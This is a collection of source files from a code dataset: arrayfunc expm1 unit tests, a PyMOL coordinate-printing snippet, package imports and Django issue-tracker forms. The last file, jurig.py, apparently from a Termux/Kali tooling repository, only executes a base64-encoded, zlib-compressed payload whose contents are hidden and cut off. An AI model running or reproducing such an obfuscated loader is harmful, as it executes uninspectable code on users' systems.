self.dataout = array.array('f', itertools.repeat(0.0, 10))
self.datainf = array.array('f', [math.inf] * 10)
self.datanan = array.array('f', [math.nan] * 10)
self.dataninf = array.array('f', [-math.inf] * 10)
########################################################
def test_expm1_outputarray(self):
"""Test expm1 for data of nan with matherrors checking on and single parameter functions - Array code f.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datanan, self.dataout)
########################################################
def test_expm1_inplace(self):
"""Test expm1 in place for data of nan with matherrors checking on and single parameter functions - Array code f.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datanan)
########################################################
def test_expm1_ov_outputarray(self):
"""Test expm1 for data of nan with matherrors checking off and single parameter functions - Array code f.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.datanan]
# This is the actual test.
arrayfunc.expm1(self.datanan, self.dataout, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.dataout), expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_ov_inplace(self):
"""Test expm1 in place for data of nan with matherrors checking off and single parameter functions - Array code f.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.datanan]
# This is the actual test.
arrayfunc.expm1(self.datanan, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.datanan), expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
##############################################################################
##############################################################################
class expm1_nandata_exceptions_nan_d(unittest.TestCase):
"""Test for basic general function operation.
nan_data_errorchecked_noparam_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.dataout = array.array('d', itertools.repeat(0.0, 10))
self.datainf = array.array('d', [math.inf] * 10)
self.datanan = array.array('d', [math.nan] * 10)
self.dataninf = array.array('d', [-math.inf] * 10)
########################################################
def test_expm1_outputarray(self):
"""Test expm1 for data of nan with matherrors checking on and single parameter functions - Array code d.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datanan, self.dataout)
########################################################
def test_expm1_inplace(self):
"""Test expm1 in place for data of nan with matherrors checking on and single parameter functions - Array code d.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datanan)
########################################################
def test_expm1_ov_outputarray(self):
"""Test expm1 for data of nan with matherrors checking off and single parameter functions - Array code d.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.datanan]
# This is the actual test.
arrayfunc.expm1(self.datanan, self.dataout, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.dataout), expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_ov_inplace(self):
"""Test expm1 in place for data of nan with matherrors checking off and single parameter functions - Array code d.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.datanan]
# This is the actual test.
arrayfunc.expm1(self.datanan, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.datanan), expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
##############################################################################
##############################################################################
class expm1_nandata_exceptions_inf_f(unittest.TestCase):
"""Test for basic general function operation.
nan_data_error_noparam_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.dataout = array.array('f', itertools.repeat(0.0, 10))
self.datainf = array.array('f', [math.inf] * 10)
self.datanan = array.array('f', [math.nan] * 10)
self.dataninf = array.array('f', [-math.inf] * 10)
########################################################
def test_expm1_outputarray(self):
"""Test expm1 for data of inf with matherrors checking on and single parameter functions - Array code f.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datainf, self.dataout)
########################################################
def test_expm1_inplace(self):
"""Test expm1 in place for data of inf with matherrors checking on and single parameter functions - Array code f.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datainf)
########################################################
def test_expm1_ov_outputarray(self):
"""Test expm1 for data of inf with matherrors checking off and single parameter functions - Array code f.
"""
# This is the actual test.
arrayfunc.expm1(self.datainf, self.dataout, matherrors=True)
########################################################
def test_expm1_ov_inplace(self):
"""Test expm1 in place for data of inf with matherrors checking off and single parameter functions - Array code f.
"""
# This is the actual test.
arrayfunc.expm1(self.datainf, matherrors=True)
##############################################################################
##############################################################################
class expm1_nandata_exceptions_inf_d(unittest.TestCase):
"""Test for basic general function operation.
nan_data_error_noparam_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.dataout = array.array('d', itertools.repeat(0.0, 10))
self.datainf = array.array('d', [math.inf] * 10)
self.datanan = array.array('d', [math.nan] * 10)
self.dataninf = array.array('d', [-math.inf] * 10)
########################################################
def test_expm1_outputarray(self):
"""Test expm1 for data of inf with matherrors checking on and single parameter functions - Array code d.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datainf, self.dataout)
########################################################
def test_expm1_inplace(self):
"""Test expm1 in place for data of inf with matherrors checking on and single parameter functions - Array code d.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datainf)
########################################################
def test_expm1_ov_outputarray(self):
"""Test expm1 for data of inf with matherrors checking off and single parameter functions - Array code d.
"""
# This is the actual test.
arrayfunc.expm1(self.datainf, self.dataout, matherrors=True)
########################################################
def test_expm1_ov_inplace(self):
"""Test expm1 in place for data of inf with matherrors checking off and single parameter functions - Array code d.
"""
# This is the actual test.
arrayfunc.expm1(self.datainf, matherrors=True)
##############################################################################
##############################################################################
class expm1_nandata_errorchecked_ninf_f(unittest.TestCase):
"""Test for basic general function operation.
nan_data_noerror_noparam_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.dataout = array.array('f', itertools.repeat(0.0, 10))
self.datainf = array.array('f', [math.inf] * 10)
self.datanan = array.array('f', [math.nan] * 10)
self.dataninf = array.array('f', [-math.inf] * 10)
########################################################
def test_expm1_outputarray(self):
"""Test expm1 for data of -inf with matherrors checking on and single parameter functions - Array code f.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf, self.dataout)
for dataoutitem, expecteditem in zip(list(self.dataout), expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_inplace(self):
"""Test expm1 in place for data of -inf with matherrors checking on and single parameter functions - Array code f.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf)
for dataoutitem, expecteditem in zip(list(self.dataninf), expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_ov_outputarray(self):
"""Test expm1 for data of -inf with matherrors checking off and single parameter functions - Array code f.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf, self.dataout, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.dataout), expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_ov_inplace(self):
"""Test expm1 in place for data of -inf with matherrors checking off and single parameter functions - Array code f.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.dataninf), expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
##############################################################################
##############################################################################
class expm1_nandata_errorchecked_ninf_d(unittest.TestCase):
"""Test for basic general function operation.
nan_data_noerror_noparam_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.dataout = array.array('d', itertools.repeat(0.0, 10))
self.datainf = array.array('d', [math.inf] * 10)
self.datanan = array.array('d', [math.nan] * 10)
self.dataninf = array.array('d', [-math.inf] * 10)
########################################################
def test_expm1_outputarray(self):
"""Test expm1 for data of -inf with matherrors checking on and single parameter functions - Array code d.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf, self.dataout)
for dataoutitem, expecteditem in zip(list(self.dataout), expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_inplace(self):
"""Test expm1 in place for data of -inf with matherrors checking on and single parameter functions - Array code d.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf)
for dataoutitem, expecteditem in zip(list(self.dataninf), expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_ov_outputarray(self):
"""Test expm1 for data of -inf with matherrors checking off and single parameter functions - Array code d.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf, self.dataout, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.dataout), expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_ov_inplace(self):
"""Test expm1 in place for data of -inf with matherrors checking off and single parameter functions - Array code d.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.dataninf), expected):
# The behavour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
##############################################################################
##############################################################################
if __name__ == '__main__':
# Check to see if the log file option has been selected. This is an option
# which we have added in order to decide where to output the results.
if '-l' in sys.argv:
# Remove the option from the argument list so that "unittest" does
# not complain about unknown options.
sys.argv.remove('-l')
with open('af_unittest.txt', 'a') as f:
f.write('\n\n')
f.write('expm1\n\n')
trun = unittest.TextTestRunner(f)
unittest.main(testRunner=trun)
else:
unittest.main()
##############################################################################
| 34.549784 | 118 | 0.607743 | 4,586 | 39,905 | 5.219799 | 0.064544 | 0.043989 | 0.048124 | 0.020052 | 0.953964 | 0.948659 | 0.948492 | 0.945484 | 0.941056 | 0.940889 | 0 | 0.015152 | 0.13665 | 39,905 | 1,154 | 119 | 34.579723 | 0.67967 | 0.344318 | 0 | 0.908397 | 0 | 0 | 0.011436 | 0 | 0 | 0 | 0 | 0 | 0.178117 | 1 | 0.193384 | false | 0.020356 | 0.022901 | 0 | 0.24173 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ba6929ad74a2e2529d78e3c96b5dea847a41d661 | 788 | py | Python | Programming/printNamesCoordinates.py | MooersLab/jupyterlabpymolpysnipsplus | b886750d63372434df53d4d6d7cdad6cb02ae4e7 | [
"MIT"
] | null | null | null | Programming/printNamesCoordinates.py | MooersLab/jupyterlabpymolpysnipsplus | b886750d63372434df53d4d6d7cdad6cb02ae4e7 | [
"MIT"
] | null | null | null | Programming/printNamesCoordinates.py | MooersLab/jupyterlabpymolpysnipsplus | b886750d63372434df53d4d6d7cdad6cb02ae4e7 | [
"MIT"
] | null | null | null | # Description: Print the atom names as tuples and coordinates of the atoms in a residue as a list.
# Source: https://www.pymolwiki.org/index.php/Sync
"""
cmd.do('stored.coords = []; iterate_state 1, (resi ${1:101}), stored.coords.append([x,y,z]); ')
cmd.do('stored.names = []; iterate_state 1, (resi ${1:101}), stored.names.append([name]);')
cmd.do('stored.names3 = [tuple(i) for i in stored.names];')
cmd.do('[print(i,j) for i,j in(zip(stored.names3, stored.coords)];')
"""
cmd.do('stored.coords = []; iterate_state 1, (resi 101), stored.coords.append([x,y,z]); ')
cmd.do('stored.names = []; iterate_state 1, (resi 101), stored.names.append([name]);')
cmd.do('stored.names3 = [tuple(i) for i in stored.names];')
cmd.do('[print(i,j) for i,j in(zip(stored.names3, stored.coords)];')
| 52.533333 | 99 | 0.663706 | 134 | 788 | 3.873134 | 0.320896 | 0.077071 | 0.127168 | 0.131021 | 0.77842 | 0.77842 | 0.77842 | 0.774566 | 0.643545 | 0.643545 | 0 | 0.031429 | 0.111675 | 788 | 14 | 100 | 56.285714 | 0.71 | 0.591371 | 0 | 0 | 0 | 0.5 | 0.84345 | 0.252396 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2442182124c3858db642fbd16fbecc2b5f484989 | 270 | py | Python | src/services/misc/__init__.py | Fom123/fastapi-project | ce7926367824ad3836fbdbfec366f19e2c6f5b4c | [
"MIT"
] | 17 | 2021-09-12T14:08:30.000Z | 2022-03-29T12:07:31.000Z | src/services/misc/__init__.py | Fom123/fastapi-project | ce7926367824ad3836fbdbfec366f19e2c6f5b4c | [
"MIT"
] | null | null | null | src/services/misc/__init__.py | Fom123/fastapi-project | ce7926367824ad3836fbdbfec366f19e2c6f5b4c | [
"MIT"
] | 4 | 2021-09-30T13:06:42.000Z | 2022-03-29T15:05:59.000Z | from .schemas import (
User,
DefaultResponse,
TestResponse,
Product,
SimpleResponse,
Token,
TokenData,
)
__all__ = (
"User",
"DefaultResponse",
"TestResponse",
"Product",
"SimpleResponse",
"Token",
"TokenData",
)
| 13.5 | 22 | 0.577778 | 18 | 270 | 8.444444 | 0.611111 | 0.25 | 0.407895 | 0.5 | 0.868421 | 0.868421 | 0.868421 | 0 | 0 | 0 | 0 | 0 | 0.296296 | 270 | 19 | 23 | 14.210526 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0.244444 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.055556 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
79edc029ab276edd0c08bca31915d195f0e6c902 | 97 | py | Python | tacotron2/vocoders/__init__.py | alexeykarnachev/tacotron2 | fb835c9429215486d302caa2a3813964b4dd24ff | [
"BSD-3-Clause"
] | 1 | 2020-03-03T23:04:05.000Z | 2020-03-03T23:04:05.000Z | tacotron2/vocoders/__init__.py | alexeykarnachev/tacotron2 | fb835c9429215486d302caa2a3813964b4dd24ff | [
"BSD-3-Clause"
] | null | null | null | tacotron2/vocoders/__init__.py | alexeykarnachev/tacotron2 | fb835c9429215486d302caa2a3813964b4dd24ff | [
"BSD-3-Clause"
] | 1 | 2020-03-26T19:37:46.000Z | 2020-03-26T19:37:46.000Z | from tacotron2.vocoders.waveglow import WaveGlow
from tacotron2.vocoders.waveflow import WaveFlow | 48.5 | 48 | 0.886598 | 12 | 97 | 7.166667 | 0.5 | 0.302326 | 0.488372 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022222 | 0.072165 | 97 | 2 | 49 | 48.5 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0344de3c41692a2249862031162fb8ba3d250799 | 3,930 | py | Python | issue_tracker_root/issues/forms.py | efefre/issue_tracker | 5f4935830ce2e884858949eda5c8b8506365c317 | [
"MIT"
] | null | null | null | issue_tracker_root/issues/forms.py | efefre/issue_tracker | 5f4935830ce2e884858949eda5c8b8506365c317 | [
"MIT"
] | 2 | 2020-02-17T18:24:35.000Z | 2021-03-18T23:53:10.000Z | issue_tracker_root/issues/forms.py | efefre/issue_tracker | 5f4935830ce2e884858949eda5c8b8506365c317 | [
"MIT"
] | 1 | 2020-02-15T16:42:29.000Z | 2020-02-15T16:42:29.000Z | from django import forms
from .models import Project, Issue, Attachment, Comment
from django.forms.models import inlineformset_factory
class AddProjectForm(forms.ModelForm):
class Meta:
model = Project
fields = ("name", "slug", "status")
widgets = {
"name": forms.TextInput(
attrs={"class": "form-control", "placeholder": "Enter project name"}
),
"slug": forms.TextInput(
attrs={
"class": "form-control",
"placeholder": "Enter slug (only letters)",
}
),
"status": forms.Select(attrs={"class": "form-control"}),
}
class EditProjectForm(forms.ModelForm):
class Meta:
model = Project
fields = ("name", "slug", "status")
widgets = {
"name": forms.TextInput(
attrs={"class": "form-control", "placeholder": "Enter project name"}
),
"slug": forms.TextInput(
attrs={
"class": "form-control",
"placeholder": "Enter slug (only letters)",
}
),
"status": forms.Select(attrs={"class": "form-control"}),
}
class AddIssueForm(forms.ModelForm):
class Meta:
model = Issue
fields = (
"summary",
"status",
"type",
"priority",
"assignee",
"description",
"environment",
)
widgets = {
"summary": forms.TextInput(
attrs={"class": "form-control", "placeholder": "Enter summary"}
),
"description": forms.Textarea(
attrs={"class": "form-control", "placeholder": "Description"}
),
"status": forms.Select(attrs={"class": "form-control"}),
"type": forms.Select(attrs={"class": "form-control"}),
"priority": forms.Select(attrs={"class": "form-control"}),
"assignee": forms.Select(attrs={"class": "form-control"}),
"environment": forms.Select(attrs={"class": "form-control"}),
}
class EditIssueForm(forms.ModelForm):
class Meta:
model = Issue
fields = (
"summary",
"status",
"type",
"priority",
"assignee",
"description",
"environment",
)
widgets = {
"summary": forms.TextInput(
attrs={"class": "form-control", "placeholder": "Enter summary"}
),
"description": forms.Textarea(
attrs={"class": "form-control", "placeholder": "Description"}
),
"status": forms.Select(attrs={"class": "form-control"}),
"type": forms.Select(attrs={"class": "form-control"}),
"priority": forms.Select(attrs={"class": "form-control"}),
"assignee": forms.Select(attrs={"class": "form-control"}),
"environment": forms.Select(attrs={"class": "form-control"}),
}
class AddAttachmentForm(forms.ModelForm):
class Meta:
model = Attachment
exclude = ()
AttachmentFormset = inlineformset_factory(
Issue,
Attachment,
form=AddAttachmentForm,
fields=["file",],
extra=1,
can_delete=True,
)
class AddCommentForm(forms.ModelForm):
class Meta:
model = Comment
fields = ("text",)
widgets = {
"text": forms.Textarea(
attrs={"class": "form-control", "placeholder": "Your comment..."}
)
}
class EditCommentForm(forms.ModelForm):
class Meta:
model = Comment
fields = ("text",)
widgets = {
"text": forms.Textarea(
attrs={"class": "form-control", "placeholder": "Your comment..."}
)
}
| 28.478261 | 84 | 0.497201 | 311 | 3,930 | 6.273312 | 0.170418 | 0.112763 | 0.157868 | 0.236802 | 0.822142 | 0.807791 | 0.807791 | 0.807791 | 0.807791 | 0.807791 | 0 | 0.000393 | 0.352417 | 3,930 | 137 | 85 | 28.686131 | 0.766208 | 0 | 0 | 0.721739 | 0 | 0 | 0.240204 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.026087 | 0 | 0.147826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0372fbd35bde7029921334fa345983a9258cdeea | 6,471 | py | Python | jurig.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | 2 | 2021-11-17T03:35:03.000Z | 2021-12-08T06:00:31.000Z | jurig.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | null | null | null | jurig.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | 2 | 2021-11-05T18:07:48.000Z | 2022-02-24T21:25:07.000Z | import marshal,zlib,base64
exec(zlib.decompress(base64.b64decode("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